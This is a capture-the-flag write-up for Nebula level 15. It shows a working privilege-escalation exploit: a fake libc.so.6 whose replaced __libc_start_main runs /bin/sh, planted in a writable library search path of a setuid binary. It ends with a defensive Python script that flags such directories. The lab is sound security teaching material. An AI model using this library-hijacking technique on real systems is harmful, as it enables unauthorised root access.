Nebula - Level 15 - Library Loading
About
strace the binary at /home/flag15/flag15 and see if you spot anything out
of the ordinary.
You may wish to review how to “compile a shared library in linux” and how the
libraries are loaded and processed by reviewing the dlopen manpage in
depth.
Clean up after yourself :)
To do this level, log in as the level15 account with the password
level15. Files for this level can be found in /home/flag15.
Solution
Running strace shows that the binary searches for several libraries under
/var/tmp/flag15/*. We use this information to supply the library the program looks for
by crafting a custom libc.so.6. Create a file run.sh with /bin/bash as the contents. Then create the
shared library source libc.c with the following contents:
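
    #include <unistd.h>
    #include <stdio.h>
    #include <sys/syscall.h>

    /* Stub for a symbol the binary expects to find in libc. */
    void __cxa_finalize(void *d) {
        return;
    }

    /* Replaces glibc's startup hook, which runs before main(). */
    int __libc_start_main(int (*main)(int, char **, char **), int argc, char **ubp_av,
                          void (*init)(void), void (*fini)(void),
                          void (*rtld_fini)(void), void *stack_end) {
        /* argv must be NULL-terminated, and execve() takes an envp argument. */
        char *args[] = {"/bin/sh", "/home/level15/run.sh", NULL};
        execve("/bin/sh", args, NULL);
        return 0;
    }
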
Compile the library with

    gcc -fPIC -g -c -Wall /home/level15/libc.c && \
    gcc -shared -Wl,-Bstatic,-soname,libc.so.6,--version-script,version -o libc.so.6 libc.o -L/usr/lib/i386-linux-gnu -static-libgcc

The --version-script option expects a linker version script named version in the current directory.
Then copy the library to the correct directory:

    cp libc.so.6 /var/tmp/flag15/tls/i686/sse2/libc.so.6

Execute the program to get a shell. Note that /bin/bash MUST NOT be used, as bash will often attempt
to drop privileges when executing.
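
The strace observation this level relies on can also be checked for when auditing a privileged binary. The following is an added example, not part of the original write-up: it pulls the directories the loader probed out of strace output and flags those that someone other than the owner can write to or create. The sample trace is constructed and the function names are illustrative.

```python
import os
import re
import stat

# Constructed sample of strace output (illustrative, not captured from flag15).
SAMPLE_STRACE = """\
open("/var/tmp/flag15/tls/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3
"""

# open()/openat() calls whose path ends in .so or .so.N (skips ld.so.cache).
LIB_OPEN = re.compile(r'\bopen(?:at)?\((?:AT_FDCWD, )?"([^"]+\.so(?:\.\d+)*)"')


def library_probe_dirs(strace_text):
    """Directories the loader probed for shared objects, in first-seen order."""
    dirs = []
    for line in strace_text.splitlines():
        match = LIB_OPEN.search(line)
        if match and os.path.dirname(match.group(1)) not in dirs:
            dirs.append(os.path.dirname(match.group(1)))
    return dirs


def writable_by_others(path):
    """True if path, or its nearest existing ancestor, is group- or world-writable.

    A missing directory counts as exposed when someone else can create it.
    """
    while not os.path.exists(path):
        parent = os.path.dirname(path)
        if parent == path:
            return False
        path = parent
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_dirs(strace_text, is_writable=writable_by_others):
    """Probed library directories that an unprivileged user could populate."""
    return [d for d in library_probe_dirs(strace_text) if is_writable(d)]


if __name__ == "__main__":
    for directory in risky_dirs(SAMPLE_STRACE):
        print("loader searches a directory others can write:", directory)
```

Any directory this reports for a setuid binary should be removed from the binary's library search path or made writable only by root.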